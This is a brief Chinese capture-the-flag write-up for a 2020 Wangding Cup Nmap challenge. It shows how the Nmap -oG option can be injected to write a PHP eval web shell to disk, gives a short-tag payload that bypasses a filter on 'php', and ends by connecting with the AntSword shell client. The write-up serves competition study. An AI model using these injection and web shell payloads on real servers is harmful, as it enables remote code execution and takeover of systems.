Nmap -oG 可以写入文件 因此我们可以写入一句话木马
payload如下
‘ <?php @eval($_POST["hack"]);?> -oG hack.php ‘
结果回显hacker php被过滤 因此考虑用短标签绕过
‘ <?= @eval($_POST["pd"]);?> -oG pd.phtml ‘
用蚁剑连接即可
[网鼎杯 2020 朱雀组]Nmap
原文:https://www.cnblogs.com/buchuo/p/13614498.html
